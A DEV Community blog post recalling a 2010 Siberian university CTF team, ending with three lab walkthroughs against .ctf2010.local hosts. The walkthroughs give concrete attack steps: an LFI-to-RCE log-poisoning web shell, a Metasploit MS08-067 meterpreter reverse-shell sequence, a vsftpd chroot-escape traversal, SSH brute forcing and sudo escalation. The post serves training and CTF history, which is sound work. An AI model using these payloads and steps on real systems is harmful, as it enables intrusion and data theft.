DEV Community

Ivan Piskunov
Ivan Piskunov

Posted on

šŸ”Back to the Roots: Nostalgic Journey to University CTF Battles of the Early 2010s

🧠 A Flashback to the Dawn of Competitive Hacking

The year is 2010. The world is recovering from the financial crisis, Apple’s iPhone 4 is redefining mobile technology, and in the dimly lit computer labs of universities across the globe, a different revolution is brewing—the rise of competitive cybersecurity capture-the-flag (CTF) competitions.

I was there—a passionate student, fueled by endless cups of coffee, the thrill of the chase, and the dream of outsmarting a system. It was a time when hacking culture wasn't just about skill; it was about camaraderie, curiosity, and crafting solutions with limited resources but unlimited creativity.

Recently, I stumbled upon a treasure trove of memories—old code, challenge descriptions, and infrastructure setups from the CTF competitions I participated in with my team, Cr@zY Geek$. These weren't just games; they were battlegrounds where we honed our skills, learned from failures, and built the foundation of our careers in cybersecurity.

Today, I’m opening this time capsule and sharing it with the community. Whether you're a veteran who lived through these times or a newcomer curious about the roots of ethical hacking, there’s something here for you.

āš”ļø The Attack & Defence Era: Where Real-Time Strategy Met Hackery

Most modern CTFs focus on jeopardy-style challenges (solving standalone puzzles), but our competitions often featured the intense Attack & Defence (A&D) format . This was the real deal—a high-stakes simulation of real-world cybersecurity warfare.

  • Your Team's Mission: Protect your own vulnerable services (running on custom infrastructure) from being exploited by opposing teams while simultaneously attacking their systems to steal "flags" (specific pieces of data).
  • The Infrastructure: Our setups, meticulously documented in Markdown files now hosted on GitHub, were built on a shoestring budget. Think old desktop computers repurposed as servers, networked together in a lab, often running on Linux distributions that were considered cutting-edge at the time. Managing these systems taught us more about practical network administration and security hardening than any textbook could.
  • The Challenges: The vulnerabilities we planted and exploited were classics that are still relevant today: poorly sanitized inputs leading to SQL injection (SQLi) in web apps, buffer overflows in custom network services, misconfigured permissions, and cryptographic weaknesses . The key difference? We had to find and patch these flaws in our own services while everyone else was trying to exploit them—a brutal but incredibly effective learning process.

šŸ› ļø The Tools of the Trade: A Different Time

Our toolkit in 2010 was vastly different from the standardized platforms available today.

  • Kali Linux predecessor, BackTrack, was the go-to penetration testing distribution for many .
  • Web Vulnerability Scanners: Tools like Burp Suite were already indispensable for probing web applications, but their features were far less automated than they are now . Manual testing and a deep understanding of HTTP protocols were paramount.
  • Reverse Engineering: For binary challenges, OllyDbg on Windows and GDB on Linux were our debuggers of choice. IDA Pro was the powerful (and expensive) disassembler we aspired to master .
  • The Spirit of DIY: Perhaps the most significant difference was the lack of managed platforms. Much of the infrastructure for the competitions—from the game master servers to the scoring engines—was built from scratch by the organizers and participating teams. This forced us to understand the entire stack, from low-level networking to application logic.

āš”ļø About Cr@zY Geek$ CTF Team

The Cr@zY Geek$ team was formed in 2009 by enthusiasts and then-students of the Information Security Department of the Engineering and Technology Institute of the Siberian Academy of Law, Economics, and Management (SALEM) in Irtutsk city.

With the support of our programming team leader Oleg Usenko and Linux guru Yuri Nikolaevich Perelyaev.

CrazY geek$ became one of the first teams in the Siberian Federal District and the first CTF team in the city of Irkutsk to participate in competitions related to information security.

The competitions were held according to classic rules and included various tasks: reversing, crypto, recon, exploit, information gathering, solving cases for Linux, programming, etc.

Of course, the format at that time was completely different from what it is now. However, it was the first step in this direction... It was at that moment that the author of this blog became fascinated with reverse engineering and everything related to it.

At the university competitions held in 2010 among technical universities in Irkutsk, our team, Cr@zY Geek$, took first place in the qualifying round and second place in the final.

šŸ“¦ What’s in the Archive? Sharing the Knowledge

I’ve uploaded a curated collection from those days to a GitHub repository. It includes:

  • Challenge Descriptions: The original write-ups for various A&D tasks.
  • Infrastructure Guides: Documentation on how we set up the vulnerable services and networking for our practices and competitions.
  • Scripts & Tools: Custom scripts, patches, and configuration files used to deploy, secure, and attack services. These are historical artifacts that showcase the problem-solving approaches of the era.
  • Tips & Tricks: Notes and shared knowledge from our team, offering a glimpse into our thought processes.

This isn’t just a code dump; it’s a piece of hacking history. It’s for those who value the culture, the learning process, and the raw ingenuity that defined the early days of CTFs.

šŸ¤” Why Share This Now?

  1. For the Nostalgia: For those who were there, let’s take a moment to remember the late nights, the sudden breakthroughs, and the frustration of a service going down minutes before the end of a round.
  2. For the New Generation: To show that today’s polished CTF platforms and cloud infrastructure stand on the shoulders of these grassroots, DIY efforts. The core concepts—critical thinking, persistence, and a deep understanding of systems—haven’t changed.
  3. For My Story: These competitions were a formative part of my journey into cybersecurity. They taught me strategic thinking, teamwork under pressure, and the ethics of responsible disclosure—lessons that continue to shape my professional path, including my recent work with Grow Cluster.

I encourage you to explore the repo, not necessarily for the technical answers (some of the exploits are undoubtedly outdated!), but for the mindset and the methodology. Try to understand why things were built the way they were. You might be surprised at how many principles remain timeless.

šŸ’¬ Discussion Questions: What are your earliest memories of CTF or hacking culture? What’s the most valuable lesson you’ve learned from competitive security events? Share your stories below!

The Tasks

Host Descriptions:

  • Router/GW: gateway.ctf2010.local
    • OS: Debian Linux 5.0 (Lenny) or CentOS 5.
    • Role: NAT, basic iptables firewall.
  • Web-Srv: webserver.ctf2010.local
    • OS: Ubuntu Server 10.04 LTS.
    • Services: Apache 2.2 + PHP 5.3.x.
  • Client: client-pc.ctf2010.local
    • OS: Windows XP SP3 / Windows 7.
    • Details: Legacy browser (Firefox 3.6), outdated software.
  • Internal-Server: internal.ctf2010.local
    • OS: CentOS 5.
    • Services: vsftpd, ProFTPD, Samba, SSH on a non-standard port.

Scenario 1: Web Server Attack (LFI -> RCE)

Objective: Gain a remote shell on webserver.ctf2010.local and retrieve the flag from /home/www-data/flag.txt.

Infrastructure:

  • Target: webserver.ctf2010.local (Linux)
  • Service: Apache 2.2.14 + PHP 5.3.2
  • Web App: A simple PHP site with navigation like index.php?page=news.html.

Vulnerability:

  • Local File Inclusion (LFI): The index.php script uses the page parameter without proper sanitization.
    • Vulnerable Code: <?php include($_GET['page']); ?>
  • Insecure PHP Configuration: register_globals = On and allow_url_include = Off (default).

Attack Steps:

  1. Reconnaissance: Port scanning (nmap) reveals open port 80 (HTTP).
  2. Vulnerability Discovery:
    • Test: http://webserver.ctf2010.local/index.php?page=../../../../etc/passwd
    • Success is confirmed if the contents of /etc/passwd are displayed in the response.
  3. Escalation to RCE (Remote Code Execution):
    • Method 1: Apache Log Poisoning. Force the server to write PHP code into log files (e.g., access.log) via the User-Agent header, then include the log file via LFI.
      • curl -A "<?php system(\$_GET['cmd']); ?>" http://webserver.ctf2010.local/
      • http://webserver.ctf2010.local/index.php?page=../../../../var/log/apache2/access.log&cmd=id
    • Method 2: /proc/self/environ Inclusion. If the User-Agent is stored in an environment variable and included via /proc/self/environ, this can be exploited similarly.
  4. Command Execution: Execute commands to find and read the flag: &cmd=cat /home/www-data/flag.txt.

Player's Challenge:
"Identify and exploit a critical vulnerability in the company's website to achieve remote code execution. Locate the confidential flag file on the server."

Scenario 2: Windows Client Attack (SMB + Buffer Overflow)

Objective: Gain full control of client-pc.ctf2010.local and find the flag.txt file on the user's Desktop.

Infrastructure:

  • Target: client-pc.ctf2010.local (Windows XP SP3)
  • Services: SMB (Server Message Block - ports 139/445). Critical patches (like MS08-067) are not installed.

Vulnerability:

  • MS08-067 (CVE-2008-4250): A critical remote code execution vulnerability in the Server Service. It allows an attacker to run arbitrary code without authentication.

Attack Steps:

  1. Reconnaissance: Network scanning identifies host 10.0.1.20 with port 445 (SMB) open.
  2. Vulnerability Confirmation: Use a vulnerability scanner (e.g., a classic Nessus plugin or a standalone Nmap NSE script) to check for MS08-067.
  3. Exploitation:
    • Launch Metasploit Framework (version 3.x).
    • use exploit/windows/smb/ms08_067_netapi
    • set RHOST 10.0.1.20
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • exploit
  4. Gaining Access: A successful exploit will provide a meterpreter shell session on the compromised Windows host.
  5. Flag Retrieval: Use meterpreter commands to search the filesystem: search -f flag.txt, or navigate manually: shell -> dir C:\Documents and Settings\USER\Desktop\flag.txt.

Player's Challenge:
"An employee's workstation in the corporate network is missing critical security updates. Exploit a well-known operating system vulnerability to compromise the machine and retrieve a sensitive file."

Scenario 3: Internal Service Attack (FTP + Privilege Escalation)

A multi-stage attack focusing on service exploitation and misconfiguration.

Objective: Gain root access on internal.ctf2010.local and read the final flag from /root/flag.txt.

Infrastructure:

  • Target: internal.ctf2010.local (Linux, CentOS 5)
  • Services: vsftpd 2.0.5 (vulnerable version), SSH on port 2222.

Vulnerabilities:

  1. CVE-2007-5966: A vulnerability in the chroot mechanism of vsftpd 2.0.5 that allows an authenticated user to escape the chroot jail and access the full filesystem.
  2. Privilege Escalation via Sudo: The local user ftpadmin has full sudo privileges without a password (NOPASSWD: ALL in /etc/sudoers).

Attack Steps:

  1. Reconnaissance: Scanning the target (10.0.2.30) reveals ports 21 (FTP) and 2222 (SSH).
  2. FTP Attack:
    • Connect: ftp 10.0.2.30
    • Login: Use anonymous access (or weak credentials like admin:admin).
    • Exploit vsftpd Chroot Escape: Use the CWD command to traverse outside the chroot: CWD .../.../.../.../.../.../.../.../.../.../
    • This allows listing and downloading system files like /etc/passwd and /etc/sudoers.
  3. Analysis & Privilege Escalation:
    • Analyze the downloaded /etc/sudoers file. Discover the line: ftpadmin ALL=(ALL) NOPASSWD: ALL.
    • This means the user ftpadmin can become root with the command sudo su.
  4. SSH Access & Root:
    • Brute-force or guess the password for the user ftpadmin over SSH on port 2222 (using a tool like hydra or a simple wordlist).
    • Once logged in via SSH, escalate to root: sudo su -.
    • cat /root/flag.txt.

Player's Challenge:
"Breach the internal file server by exploiting a vulnerability in its FTP service. Analyze the system's configuration to find a path to elevate your privileges to root and access the final flag."

Top comments (0)